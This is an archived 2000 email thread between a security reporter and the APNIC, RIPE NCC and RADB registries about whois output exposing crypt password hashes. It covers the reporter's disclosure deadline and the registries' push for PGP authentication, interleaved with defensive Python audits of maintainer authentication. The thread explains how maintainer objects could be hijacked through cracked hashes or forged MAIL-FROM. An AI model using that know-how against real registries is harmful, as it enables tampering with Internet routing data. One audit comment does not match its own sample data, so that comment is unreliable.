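            "needs_action": effective != "PGPKEY",
        })
    return findings


if __name__ == "__main__":
    for f in audit_mntners(SAMPLE):
        status = "REVIEW" if f["needs_action"] else "ok"
        print(f'{f["mntner"]:18} effective={f["effective"]:10} '
              f'hash_published={f["hash_published"]!s:5} {status}')
```

MAINT-EXAMPLE-B shows the case worth checking for: a PGP key was registered, but the MAIL-FROM line left beside it still sets the effective level.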

From technical@apnic.net  Wed Nov 29 20:30:12 2000
Return-Path: <technical@apnic.net>
Received: from localhost (IDENT:raju@localhost [127.0.0.1])
	by ganwaar.com (8.9.3/8.9.3) with ESMTP id UAA03257
	for <raju@localhost>; Wed, 29 Nov 2000 20:30:11 +0530
X-POP3-Rcpt: raju@linux-delhi.org
Received: from linux-delhi.org
	by localhost with POP3 (fetchmail-5.3.1)
	for raju@localhost (single-drop); Wed, 29 Nov 2000 20:30:11 +0530 (IST)
Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100])
	by biznetindia.com (8.10.2/8.10.2) with ESMTP id eATAY2m12904
	for <raju@linux-delhi.org>; Wed, 29 Nov 2000 05:34:03 -0500
Received: (from mail@localhost)
	by guardian.apnic.net (8.9.3/8.9.3) id UAA29615
	for <raju@linux-delhi.org>; Wed, 29 Nov 2000 20:33:54 +1000 (EST)
Received: from hadrian.staff.apnic.net(192.168.1.1) by int-gw.staff.apnic.net via smap (V2.1)
	id xma029612; Wed, 29 Nov 00 20:33:26 +1000
Received: (from daemon@localhost)
	by hadrian.staff.apnic.net (8.9.3/8.9.3) id UAA16435;
	Wed, 29 Nov 2000 20:33:26 +1000 (EST)
Message-Id: <200011291033.UAA16435@hadrian.staff.apnic.net>
Reply-To: RIPE Database Administration  via RT <technical@apnic.net>
X-Request-ID: 62050
X-RT-Loop-Prevention: APNIC
X-Sender: ripe-dbm@ripe.net
X-Managed-By: Request Tracker 1.0.1 (http://www.fsck.com/projects/rt)
Precedence:  
X-RT-MIME-Found: No
From: RIPE Database Administration  via RT <technical@apnic.net>
To: raju@linux-delhi.org
Cc: 
Subject: [APNIC #62050] (technical) Crypted passwords for maintainer objects 
Date: Wed, 29 Nov 2000 20:33:26 +1000 (EST)
Status: RO

Dear Raju Mathur,

This matter was originally raised in October 1994, when the RIPE document
ripe-120 (ftp://ftp.ripe.net/ripe/docs/ripe-120.txt) was published:

"It is by no means meant to keep out a determined malicious attacker. The 
crypt function is vulnerable to exhaustive search by (lots of) fast 
machines and programs to do the searching are widely  available.  For  
this reason it is strongly discouraged to use encrypted passwords also 
used for other purposes such as Unix login accounts in this scheme. As you 
are publishing the encrypted password in the database it is open  to  attack."

This was re-stated in ripe-153 (published in January 1997) and in ripe-157
(published in May 1997).  In November 1998, ripe-189 was published, in which
the RIPE NCC announced that it was supporting PGP authentication in the RIPE 
Database (the scheme is also described in RFC-2726).  In January 1999, the 
RIPE NCC published ripe-190, offering free PGP licences on request, to 
anyone who had a mntner object in the RIPE Database.  At every RIPE Meeting 
since that time, the RIPE NCC has encouraged the RIPE community to adopt PGP 
authentication.

The RIPE NCC does not manage the data in the RIPE Network Management Database.
The responsibility for maintaining and protecting the data is with those who
put the data in there.  However, the RIPE NCC has provided a PGP authentication
scheme and encourages its use.  

You give a one-week deadline before you make a public statement about this.  We
cannot unilaterally change the functionality of the RIPE Database; we only act on
the instructions of the RIPE Database Working Group, which has a mailing list:
<db-wg@ripe.net>.  We invite you to express your concerns on that list.

BTW, this is the first message from you that I have seen.  I am investigating if
we received any other message from you previous to this one.

If you have any more questions, please contact
<ripe-dbm@ripe.net>.

Kind regards,

A. M. R. Magee
______________
RIPE NCC 


 Raju Mathur <raju@linux-delhi.org> writes:
 * -----BEGIN PGP SIGNED MESSAGE-----
 * Hash: SHA1
 * 
 * Hi Bruce,
 * 
 * I've already sent a copy of this mail to RIPE and RADB.  RADB's reply
 * basically states that ``it's what the users want, so our hands are
 * tied'', which isn't very heartening.  I'm still awaiting a response
 * from RIPE.
 * 
 * While I agree that users (in general) should be given what they want,
 * I would still not (for example) allow a password-less account as a
 * Unix system administrator.  I have yet to evaluate the extent of
 * damage that a person with a cracked APNIC, RIPE or RADB password could
 * do, but I suspect that it could be pretty serious, at least in the
 * short term.  I presume that even if someone manages to change an
 * object in your database the owner/maintainer of that object would
 * still be notified and have the option of correcting the issue; however
 * even a short-term rogue change in the database can have global routing
 * and security implications (e.g. a change in the in.addr-arpa database
 * could be the precursor for major security breaches).
 * 
 * Please allow me to reiterate that the policy of displaying CRYPT-PW
 * passwords without control is viewed by me personally with great
 * concern, and I suspect that that is the view most security
 * professionals also would take.  My objective is to have a secure,
 * stable Internet, and I'm willing to do anything in power to work
 * towards this goal.  If one of those tasks is to bring potential
 * security holes into the limelight, I shall do that (by posting to
 * BUGTRAQ and CERT, albeit reluctantly); before that, however, I would
 * request you again to fix the problem at the source rather than have
 * half the script-kiddies in the world trying to attack your databases,
 * and maybe succeeding.
 * 
 * Regards,
 * 
 * - -- Raju
 * 
 * >>>>> "Bruce" == Bruce Campbell via RT <technical@apnic.net> writes:
 * 
 *     Bruce> raju@linux-delhi.org wrote (Sat, Nov 25 2000 15:22:36):
 *     >> I see that doing a whois on a maintainer object in your whois
 *     >> database reveals the DES-encrypted password of the maintainer.
 *     >> As you are aware, it is trivial to brute-force crack (decode) a
 *     >> DES password, and this is a serious security hole in your
 *     >> service.  Please treat this as a critical issue and refrain
 *     >> from revealing the DES-encrypted password in whois lookups.
 * 
 *     Bruce> The APNIC Whois Databases uses code developed by our sister
 *     Bruce> organisation for Europe (the RIPE NCC) and shares many of
 *     Bruce> the same issues.  The issue regarding the visibility of the
 *     Bruce> 'auth' attribute in the maintainer object has been
 *     Bruce> discussed before, however I regret that I am unable to find
 *     Bruce> an online reference for this discussion.
 * 
 *     Bruce> I am cc'ing the appropriate address in the RIPE NCC in the
 *     Bruce> hopes that they can provide a more definitive reference ( a
 *     Bruce> reply to the APNIC ticketing system will also reply to the
 *     Bruce> original requestor ).
 * 
 *     >> I shall be going public with this information in one week.
 *     >> Request you to have fixed the problem by then.
 * 
 *     Bruce> Kind regards,
 * 
 *     Bruce> -- Bruce Campbell <bruce.campbell@apnic.net>
 *     Bruce> +61-7-3367-0490 Systems Administrator Regional Internet
 *     Bruce> Registry Asia Pacific Network Information Centre For the
 *     Bruce> Asia Pacific Region http://www.apnic.net/db/
 *     Bruce> whois.APNIC.net
 * 
 * 
 * 
 *     Bruce> -------------------------------------------- Managed by
 *     Bruce> Request Tracker
 * -----BEGIN PGP SIGNATURE-----
 * Version: GnuPG v1.0.1 (GNU/Linux)
 * Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard <http://www.gnupg.org/>
 * 
 * iEYEARECAAYFAjoiEKgACgkQyWjQ78xo0X/OewCeO209lBqSTBrlWms8j81Lmxtb
 * vhoAnjvjbJHfE7QQ4scbd8q3ri5bokPF
 * =mKDL
 * -----END PGP SIGNATURE-----
 * 


--- Headers Follow ---

>From info@apnic.net  Wed Nov 29 20:33:24 2000
Received: (from info@localhost)
	by hadrian.staff.apnic.net (8.9.3/8.9.3) id UAA16430
	for technical-ticket; Wed, 29 Nov 2000 20:33:24 +1000 (EST)
Received: from guardian.apnic.net (int-gw.staff.apnic.net [192.168.1.254])
	by hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id UAA16426
	for <technical@staff.apnic.net>; Wed, 29 Nov 2000 20:33:24 +1000 (EST)
Received: (from mail@localhost)
	by guardian.apnic.net (8.9.3/8.9.3) id UAA29609
	for <technical@staff.apnic.net>; Wed, 29 Nov 2000 20:33:24 +1000 (EST)
Received: from whois1.apnic.net(203.37.255.98) by int-gw.staff.apnic.net via smap (V2.1)
	id xma029607; Wed, 29 Nov 00 20:33:04 +1000
Received: from birch.ripe.net (birch.ripe.net [193.0.1.96])
	by ns.apnic.net (8.9.3/8.9.3) with ESMTP id UAA122202
	for <technical@apnic.net>; Wed, 29 Nov 2000 20:33:04 +1000 (EST)
Received: from ripe.net (office.ripe.net [193.0.1.97])
	by birch.ripe.net (8.8.8/8.8.8) with ESMTP id LAA24135;
	Wed, 29 Nov 2000 11:31:26 +0100 (CET)
Message-Id: <200011291031.LAA24135@birch.ripe.net>
To: raju@linux-delhi.org
cc: Bruce Campbell via RT <technical@apnic.net>,
        gerald@merit.edu (Gerald Andrew Winters), db-admin@radb.net,
        irrd-team@merit.edu
Subject: Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects 
In-reply-to: Your message of Mon, 27 Nov 2000 13:17:01 +0530.
             <14882.4469.52414.25633@localhost.localdomain> 
References: <14882.4469.52414.25633@localhost.localdomain> 
From: RIPE Database Administration <ripe-dbm@ripe.net>
X-Organization: RIPE Network Coordination Centre
X-Phone: +31 20 535 4444
X-Fax: +31 20 535 4445
Date: Wed, 29 Nov 2000 11:31:25 +0100
Sender: ripe-dbm@ripe.net

-------------------------------------------- Managed by Request Tracker

From gerald@merit.edu  Wed Nov 29 22:33:18 2000
Return-Path: <gerald@merit.edu>
Received: from localhost (IDENT:raju@localhost [127.0.0.1])
	by ganwaar.com (8.9.3/8.9.3) with ESMTP id WAA01607
	for <raju@localhost>; Wed, 29 Nov 2000 22:33:08 +0530
X-POP3-Rcpt: raju@linux-delhi.org
Received: from linux-delhi.org
	by localhost with POP3 (fetchmail-5.3.1)
	for raju@localhost (single-drop); Wed, 29 Nov 2000 22:33:09 +0530 (IST)
Received: from backin5.merit.edu (backin5.merit.edu [198.108.60.28])
	by biznetindia.com (8.10.2/8.10.2) with ESMTP id eATFEIm19605
	for <raju@linux-delhi.org>; Wed, 29 Nov 2000 10:14:18 -0500
Received: by backin5.merit.edu (Postfix, from userid 8975)
	id 312587E503; Wed, 29 Nov 2000 10:14:07 -0500 (EST)
In-Reply-To: <14882.4469.52414.25633@localhost.localdomain> from "Raju Mathur" at Nov 27, 2000 01:17:01 PM
X-Mailer: ELM [version 2.5 PL2]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20001129151407.312587E503@backin5.merit.edu>
From: gerald@merit.edu (Gerald Andrew Winters)
To: raju@linux-delhi.org
Cc: technical@apnic.net (Bruce Campbell via RT), ripe-dbm@ripe.net,
        gerald@merit.edu (Gerald Andrew Winters), db-admin@radb.net,
        irrd-team@merit.edu
Subject: Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects
Date: Wed, 29 Nov 2000 10:14:07 -0500 (EST)
Status: RO

Raju,

> I've already sent a copy of this mail to RIPE and RADB.  RADB's reply
> basically states that ``it's what the users want, so our hands are
> tied'', which isn't very heartening.  I'm still awaiting a response
> from RIPE.

Your characterization of my comments is true.  However, I had
much more to say.  I will forward my original response 
after this email so that others can draw their own
conclusions.

> While I agree that users (in general) should be given what they want,
> I would still not (for example) allow a password-less account as a
> Unix system administrator.  

This is an unfair analogy.  The relationship between a Unix sysadmin
and his network is very much different from that between an entire community
of users and the registries.

A sysadmin simply su's and makes whatever changes are desired.  In contrast,
changes to the technology used at the registries come about from the open
standards process.  This means changes take place at a slower pace
through the meetings and with approval from the entire community.  The reason
for this is to avoid dictatorship and general anarchy.  The price
for this is a slower migration path for changes.

> I have yet to evaluate the extent of
> damage that a person with a cracked APNIC, RIPE or RADB password could
> do, but I suspect that it could be pretty serious, at least in the
> short term.  

Very true.

> Please allow me to reiterate that the policy of displaying CRYPT-PW
> passwords without control is viewed by me personally with great
> concern, and I suspect that that is the view most security
> professionals also would take.  
> My objective is to have a secure,
> stable Internet, and I'm willing to do anything in power to work
> towards this goal.  If one of those tasks is to bring potential
> security holes into the limelight, 

Very true.  However, your remark is akin to me making an Internet 
announcement something like, "SNMP v1 community strings are transmitted 
in cleartext.  This is terrible!  You have 1 week to fix it and then I'm 
going public."  It's old news.  We all know it and dislike it as
much as you.

And what about "MAIL-FROM" authentication?  You do not include
this in your remarks.  Certainly your observations would be more
potent by adding "MAIL-FROM".

Have you read RFC 2726?  Do you realize that all users can 
use this form of authentication?

> I shall do that (by posting to
> BUGTRAQ and CERT, albeit reluctantly); before that, however, I would
> request you again to fix the problem at the source rather than have
> half the script-kiddies in the world trying to attack your databases,
> and maybe succeeding.

The registries will not unilaterally go
into the databases and change data or implement new security features
without the approval of the community.  What you are suggesting won't
work anyway (i.e., you still have the "MAIL-FROM" problem).

We are all sympathetic to your criticism.  In fact the RIPE NCC and
myself have gotten up numerous times at public forums (ripe, ietf, ...)
and urged the public to convert to PGP authentication.  The registries
agree with you but real change must come from the community.

I would suggest to you to come to the meetings and make your proposal.
I'm sure you will have *many* supporters.

--Gerald Winters

From technical@apnic.net  Wed Nov 29 22:33:37 2000
Return-Path: <technical@apnic.net>
Received: from localhost (IDENT:raju@localhost [127.0.0.1])
	by ganwaar.com (8.9.3/8.9.3) with ESMTP id WAA01626
	for <raju@localhost>; Wed, 29 Nov 2000 22:33:27 +0530
X-POP3-Rcpt: raju@linux-delhi.org
Received: from linux-delhi.org
	by localhost with POP3 (fetchmail-5.3.1)
	for raju@localhost (single-drop); Wed, 29 Nov 2000 22:33:27 +0530 (IST)
Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100])
	by biznetindia.com (8.10.2/8.10.2) with ESMTP id eATFFBm19769
	for <raju@linux-delhi.org>; Wed, 29 Nov 2000 10:15:11 -0500
Received: (from mail@localhost)
	by guardian.apnic.net (8.9.3/8.9.3) id BAA01407
	for <raju@linux-delhi.org>; Thu, 30 Nov 2000 01:15:06 +1000 (EST)
Received: from hadrian.staff.apnic.net(192.168.1.1) by int-gw.staff.apnic.net via smap (V2.1)
	id xma001394; Thu, 30 Nov 00 01:14:38 +1000
Received: (from daemon@localhost)
	by hadrian.staff.apnic.net (8.9.3/8.9.3) id BAA20676;
	Thu, 30 Nov 2000 01:14:38 +1000 (EST)
Message-Id: <200011291514.BAA20676@hadrian.staff.apnic.net>
Reply-To: (Gerald Andrew Winters) via RT <technical@apnic.net>
X-Request-ID: 62050
X-RT-Loop-Prevention: APNIC
X-Sender: gerald@merit.edu
X-Managed-By: Request Tracker 1.0.1 (http://www.fsck.com/projects/rt)
Precedence:  
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: (Gerald Andrew Winters) via RT <technical@apnic.net>
To: raju@linux-delhi.org
Cc: 
Subject: [APNIC #62050] (technical) Crypted passwords for maintainer objects
Date: Thu, 30 Nov 2000 01:14:38 +1000 (EST)
Status: RO

Raju,

> I've already sent a copy of this mail to RIPE and RADB.  RADB's reply
> basically states that ``it's what the users want, so our hands are
> tied'', which isn't very heartening.  I'm still awaiting a response
> from RIPE.

Your characterization of my comments is true.  However, I had
much more to say.  I will forward my original response 
after this email so that others can draw their own
conclusions.

> While I agree that users (in general) should be given what they want,
> I would still not (for example) allow a password-less account as a
> Unix system administrator.  

This is an unfair analogy.  The relationship between a Unix sysadmin
and his network is very much different from that between an entire community
of users and the registries.

A sysadmin simply su's and makes whatever changes are desired.  In contrast,
changes to the technology used at the registries come about from the open
standards process.  This means changes take place at a slower pace
through the meetings and with approval from the entire community.  The reason
for this is to avoid dictatorship and general anarchy.  The price
for this is a slower migration path for changes.

> I have yet to evaluate the extent of
> damage that a person with a cracked APNIC, RIPE or RADB password could
> do, but I suspect that it could be pretty serious, at least in the
> short term.  

Very true.

> Please allow me to reiterate that the policy of displaying CRYPT-PW
> passwords without control is viewed by me personally with great
> concern, and I suspect that that is the view most security
> professionals also would take.  
> My objective is to have a secure,
> stable Internet, and I'm willing to do anything in power to work
> towards this goal.  If one of those tasks is to bring potential
> security holes into the limelight, 

Very true.  However, your remark is akin to me making an Internet 
announcement something like, "SNMP v1 community strings are transmitted 
in cleartext.  This is terrible!  You have 1 week to fix it and then I'm 
going public."  It's old news.  We all know it and dislike it as
much as you.

And what about "MAIL-FROM" authentication?  You do not include
this in your remarks.  Certainly your observations would be more
potent by adding "MAIL-FROM".

Have you read RFC 2726?  Do you realize that all users can 
use this form of authentication?

> I shall do that (by posting to
> BUGTRAQ and CERT, albeit reluctantly); before that, however, I would
> request you again to fix the problem at the source rather than have
> half the script-kiddies in the world trying to attack your databases,
> and maybe succeeding.

The registries will not unilaterally go
into the databases and change data or implement new security features
without the approval of the community.  What you are suggesting won't
work anyway (i.e., you still have the "MAIL-FROM" problem).

We are all sympathetic to your criticism.  In fact the RIPE NCC and
myself have gotten up numerous times at public forums (ripe, ietf, ...)
and urged the public to convert to PGP authentication.  The registries
agree with you but real change must come from the community.

I would suggest to you to come to the meetings and make your proposal.
I'm sure you will have *many* supporters.

--Gerald Winters


--- Headers Follow ---

>From info@apnic.net  Thu Nov 30 01:14:36 2000
Received: (from info@localhost)
	by hadrian.staff.apnic.net (8.9.3/8.9.3) id BAA20671
	for technical-ticket; Thu, 30 Nov 2000 01:14:36 +1000 (EST)
Received: from guardian.apnic.net (int-gw.staff.apnic.net [192.168.1.254])
	by hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id BAA20667
	for <technical@staff.apnic.net>; Thu, 30 Nov 2000 01:14:36 +1000 (EST)
Received: (from mail@localhost)
	by guardian.apnic.net (8.9.3/8.9.3) id BAA01391
	for <technical@staff.apnic.net>; Thu, 30 Nov 2000 01:14:36 +1000 (EST)
Received: from whois1.apnic.net(203.37.255.98) by int-gw.staff.apnic.net via smap (V2.1)
	id xma001389; Thu, 30 Nov 00 01:14:11 +1000
Received: from backin5.merit.edu (backin5.merit.edu [198.108.60.28])
	by ns.apnic.net (8.9.3/8.9.3) with ESMTP id BAA95119
	for <technical@apnic.net>; Thu, 30 Nov 2000 01:14:12 +1000 (EST)
Received: by backin5.merit.edu (Postfix, from userid 8975)
	id 312587E503; Wed, 29 Nov 2000 10:14:07 -0500 (EST)
Subject: Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects
To: raju@linux-delhi.org
Date: Wed, 29 Nov 2000 10:14:07 -0500 (EST)
Cc: technical@apnic.net (Bruce Campbell via RT), ripe-dbm@ripe.net,
        gerald@merit.edu (Gerald Andrew Winters), db-admin@radb.net,
        irrd-team@merit.edu
In-Reply-To: <14882.4469.52414.25633@localhost.localdomain> from "Raju Mathur" at Nov 27, 2000 01:17:01 PM
X-Mailer: ELM [version 2.5 PL2]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20001129151407.312587E503@backin5.merit.edu>
From: gerald@merit.edu (Gerald Andrew Winters)

-------------------------------------------- Managed by Request Tracker

From gerald@merit.edu  Wed Nov 29 22:34:03 2000
Return-Path: <gerald@merit.edu>
Received: from localhost (IDENT:raju@localhost [127.0.0.1])
	by ganwaar.com (8.9.3/8.9.3) with ESMTP id WAA01639
	for <raju@localhost>; Wed, 29 Nov 2000 22:33:57 +0530
X-POP3-Rcpt: raju@linux-delhi.org
Received: from linux-delhi.org
	by localhost with POP3 (fetchmail-5.3.1)
	for raju@localhost (single-drop); Wed, 29 Nov 2000 22:33:57 +0530 (IST)
Received: from backin5.merit.edu (backin5.merit.edu [198.108.60.28])
	by biznetindia.com (8.10.2/8.10.2) with ESMTP id eATFK6m20812
	for <raju@linux-delhi.org>; Wed, 29 Nov 2000 10:20:07 -0500
Received: by backin5.merit.edu (Postfix, from userid 8975)
	id 50D447E502; Wed, 29 Nov 2000 10:20:06 -0500 (EST)
X-Mailer: ELM [version 2.5 PL2]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20001129152006.50D447E502@backin5.merit.edu>
From: gerald@merit.edu (Gerald Andrew Winters)
To: raju@linux-delhi.org
Cc: technical@apnic.net, ripe-dbm@ripe.net, irrd-team@merit.edu
Subject: Re: [RADB #15112] Crypted passwords for maintainer objects (fwd)
Date: Wed, 29 Nov 2000 10:20:06 -0500 (EST)
Status: RO

>From gerald@merit.edu  Sun Nov 26 13:59:30 2000
Return-Path: <gerald@merit.edu>
Delivered-To: gerald@home.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by backin5.merit.edu (Postfix) with ESMTP id C5D547E54D
	for <gerald@home.merit.edu>; Sun, 26 Nov 2000 13:59:30 -0500 (EST)
Received: by segue.merit.edu (Postfix)
	id 87B8F5DDD1; Sun, 26 Nov 2000 13:59:29 -0500 (EST)
Delivered-To: gerald@merit.edu
Received: from backin5.merit.edu (backin5.merit.edu [198.108.60.28])
	by segue.merit.edu (Postfix) with ESMTP id 66F835DD97
	for <irrd-team@mail.merit.edu>; Sun, 26 Nov 2000 13:59:29 -0500 (EST)
Received: by backin5.merit.edu (Postfix)
	id 21E217E549; Sun, 26 Nov 2000 13:59:29 -0500 (EST)
Delivered-To: irrd-team@merit.edu
Received: by backin5.merit.edu (Postfix, from userid 8975)
	id C7F8E7E540; Sun, 26 Nov 2000 13:59:28 -0500 (EST)
Subject: Re: [RADB #15112] Crypted passwords for maintainer objects
To: raju@linux-delhi.org
Date: Sun, 26 Nov 2000 13:59:28 -0500 (EST)
Cc: db-admin@radb.net, irrd-team@merit.edu
In-Reply-To: <14879.34070.278516.159670@localhost.localdomain> from "Raju Mathur" at Nov 25, 2000 02:53:34 PM
X-Mailer: ELM [version 2.5 PL2]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20001126185928.C7F8E7E540@backin5.merit.edu>
From: gerald@merit.edu (Gerald Andrew Winters)

Hello Raju,

Thank you for your comments.  We obviously do not want
security loopholes and appreciate your feedback.

However, showing the DES-encrypted password in the maintainer
was a decision made by the internet community and is not a local
decision by us.  (Please see ripe-120.ps for details at www.ripe.net).
The important fact is this is a community based decision.

People can use whatever level of security they wish.  You can
have no authentication to PGP authentication (see www.radb.net for
details).  We actively solicit the community to use PGP authentication
as it is very easy now to register your pgp key in the registry.  
However, the level of authentication is an individual decision and we 
cannot force anyone in this regard.

I'm sure you've also noticed that "MAIL-FROM" is a very common
form of authentication currently in use.  I think it is easier
to fake a 'mail from' header than to decode a DES password.  So there
is much room for improvement in regards to registry authentication.

All is not as bad as it may seem.  More and more users are switching
to pgp authentication and by early summer we intend to have
RFC 2725 implemented in our registry software which addresses many
security problems.

Thank you for the advance notice in regards to giving us a week
to fix this problem.  However, you are welcome to notify the community 
about this whenever you wish.

--Gerald Winters


> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Hi,
> 
> I see that doing a whois on a maintainer object in your whois database
> reveals the DES-encrypted password of the maintainer if s/he is using
> password as his/her authentication scheme.  As you are aware, it is
> trivial to brute-force crack (decode) a DES password, and this is a
> serious security hole in your service.  Please treat this as a
> critical issue and refrain from revealing the DES-encrypted password
> in whois lookups.
> 
> I shall be going public with this information in one week.  Request
> you to have fixed the problem by then.
> 
> Regards,
> 
> - -- Raju Mathur
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.1 (GNU/Linux)
> Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard <http://www.gnupg.org/>
> 
> iEYEARECAAYFAjofhQsACgkQyWjQ78xo0X/ypQCfS4NkeuyRMD9Qshx743dgVt1z
> FmMAn3e/ahXFjLVuVGu02KvkdHjDx/kK
> =SPnT
> -----END PGP SIGNATURE-----
> 
> 
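
The range of authentication levels described in the reply above (none, MAIL-FROM, a published crypt password, PGP) can be checked from the maintainer's side. The following Python audit is an added example, not part of the original correspondence or of any registry's software: the sample objects are constructed, the function names are hypothetical, the spellings NONE and PGPKEY-<id> are assumed from RPSL (RFC 2622, RFC 2726), and it assumes an update that satisfies any one auth line is accepted, so a maintainer is only as strong as its weakest line.

```python
# Added example: audit the auth schemes on mntner objects in whois output.
# CRYPT-PW and MAIL-FROM are the names used in the thread; NONE and
# PGPKEY-<id> are assumed RPSL spellings (RFC 2622 / RFC 2726).
STRENGTH = {"NONE": 0, "MAIL-FROM": 1, "CRYPT-PW": 2, "PGPKEY": 3}

REASON = {
    "NONE": "no authentication at all",
    "MAIL-FROM": "a From: header is trivially forged",
    "CRYPT-PW": "the published crypt() hash is open to exhaustive search",
    "UNKNOWN": "scheme not recognised by this audit, review by hand",
}

# Constructed sample, not real registry data. The hash is a placeholder.
SAMPLE = """\
% constructed whois output

mntner:   MAINT-EXAMPLE-A
descr:    Example network A
auth:     CRYPT-PW abPLACEHOLDER
auth:     PGPKEY-0A1B2C3D
mnt-by:   MAINT-EXAMPLE-A

mntner:   MAINT-EXAMPLE-B
descr:    Example network B,
          second line of description
auth:     MAIL-FROM hostmaster@example.net

mntner:   MAINT-EXAMPLE-C
auth:     PGPKEY-1A2B3C4D

inetnum:  192.0.2.0 - 192.0.2.255
mnt-by:   MAINT-EXAMPLE-C
"""


def parse_objects(text):
    """Split whois output into objects, each a list of (attribute, value)."""
    objects, current = [], []
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip():                 # blank line ends an object
            if current:
                objects.append(current)
                current = []
            continue
        if line.startswith(("%", "#")):      # server comment lines
            continue
        if line[0] in " \t+" and current:    # continuation of previous value
            attr, val = current[-1]
            current[-1] = (attr, (val + " " + line[1:].strip()).strip())
            continue
        attr, sep, val = line.partition(":")
        if sep:
            current.append((attr.strip().lower(), val.strip()))
    if current:
        objects.append(current)
    return objects


def classify_auth(value):
    """Map one auth value to a scheme name, or UNKNOWN."""
    parts = value.split()
    scheme = parts[0].upper() if parts else ""
    if scheme.startswith("PGPKEY-"):
        return "PGPKEY"
    return scheme if scheme in STRENGTH else "UNKNOWN"


def audit_maintainers(text):
    """Return one report per mntner object, ranked by its weakest auth line."""
    report = []
    for obj in parse_objects(text):
        if obj[0][0] != "mntner":
            continue
        auths = [val for attr, val in obj if attr == "auth"]
        schemes = [classify_auth(val) for val in auths]
        known = [s for s in schemes if s in STRENGTH]
        if known:
            effective = min(known, key=STRENGTH.get)
        else:
            effective = "UNKNOWN" if schemes else "NONE"
        # A CRYPT-PW line that carries its hash exposes it to every querier.
        hash_exposed = any(
            classify_auth(val) == "CRYPT-PW" and len(val.split()) > 1
            for val in auths)
        findings = []
        if effective != "PGPKEY":
            findings.append(f"updates accepted via {effective}: {REASON[effective]}")
        if "PGPKEY" in schemes and effective != "PGPKEY":
            findings.append("PGP key registered, but a weaker auth line remains")
        if hash_exposed:
            findings.append("crypt hash is visible in whois output")
        report.append({"mntner": obj[0][1], "schemes": schemes,
                       "effective": effective, "hash_exposed": hash_exposed,
                       "findings": findings})
    return report


if __name__ == "__main__":
    for entry in audit_maintainers(SAMPLE):
        print(entry["mntner"], entry["effective"], entry["findings"] or "ok")
```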


From ripe-dbm@ripe.net  Sat Dec  2 09:02:13 2000
Return-Path: <ripe-dbm@ripe.net>
Received: from localhost (IDENT:raju@localhost [127.0.0.1])
	by ganwaar.com (8.9.3/8.9.3) with ESMTP id JAA03715
	for <raju@localhost>; Sat, 2 Dec 2000 09:02:08 +0530
X-POP3-Rcpt: raju@linux-delhi.org
Received: from linux-delhi.org
	by localhost with POP3 (fetchmail-5.3.1)
	for raju@localhost (single-drop); Sat, 02 Dec 2000 09:02:08 +0530 (IST)
Received: from birch.ripe.net (birch.ripe.net [193.0.1.96])
	by biznetindia.com (8.10.2/8.10.2) with ESMTP id eB1Hd6328772
	for <raju@linux-delhi.org>; Fri, 1 Dec 2000 12:39:06 -0500
Received: from ripe.net (office.ripe.net [193.0.1.97])
	by birch.ripe.net (8.8.8/8.8.8) with ESMTP id SAA10340;
	Fri, 1 Dec 2000 18:39:00 +0100 (CET)
Message-Id: <200012011739.SAA10340@birch.ripe.net>
In-reply-to: Your message of Thu, 30 Nov 2000 11:00:19 +0530.
             <14885.58859.501931.193491@localhost.localdomain> 
References: <14885.58859.501931.193491@localhost.localdomain> 
X-Organization: RIPE Network Coordination Centre
X-Phone: +31 20 535 4444
X-Fax: +31 20 535 4445
From: RIPE Database Administration <ripe-dbm@ripe.net>
Sender: ripe-dbm@ripe.net
To: raju@linux-delhi.org
cc: technical@apnic.net (Bruce Campbell via RT), db-admin@radb.net,
        irrd-team@merit.edu, gerald@merit.edu (Gerald Andrew Winters)
Subject: Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects 
Date: Fri, 01 Dec 2000 18:39:00 +0100
Status: RO

Dear Raju Mathur,

 Raju Mathur <raju@linux-delhi.org> writes:
 * [Munging two messages into one reply to keep everyone in sync]
 * 
 * Hi Gerald, Mr/Ms Magee,
 * 
 * Calculate cost of 1% of maintainer objects in the databases getting
 * perverted using a script like the attached one.  Weigh against cost of
 * public outcry if you unilaterally decide to not reveal auth schemes in
 * whois lookups.  Decide which is cheaper.
 * 
 * I'm not going public with the script until either a deadline for
 * changing the whois behaviour determined by you passes, or you decide
 * not to make such a deadline.

In January 1999, RIPE NCC deployed a PGP scheme for authenticating
updates in the RIPE Database and the RIPE NCC encouraged the RIPE
community to use it and continues to do so.
 
The RIPE NCC can only change the functionality of the RIPE Database on
the request of the RIPE Database Working Group, which has a well-defined
procedure for discussing proposed changes.  Its mailing list is
<db-wg@ripe.net> and you are most welcome to express your concerns on
that list and/or at a RIPE meeting. The next meeting is in January 2001, in 
Amsterdam, the Netherlands.

If you have any more questions, please contact
<ripe-dbm@ripe.net>.

Regards,

A. M. R. Magee
______________
RIPE NCC 

> 
 * 
 * Regards,
 * 
 * -- Raju
 * 
 * >>>>> "RIPE" == RIPE Database Administration via RT <technical@apnic.net> writes:
 * 
 *     RIPE> Dear Raju Mathur, This matter was originally raised in
 *     RIPE> October 1994, when the RIPE document ripe-120
 *     RIPE> (ftp://ftp.ripe.net/ripe/docs/ripe-120.txt) was published:
 * 
 *     RIPE> "It is by no means meant to keep out a determined malicious
 *     RIPE> attacker. The crypt function is vulnerable to exhaustive
 *     RIPE> search by (lots of) fast machines and programs to do the
 *     RIPE> searching are widely available.  For this reason it is
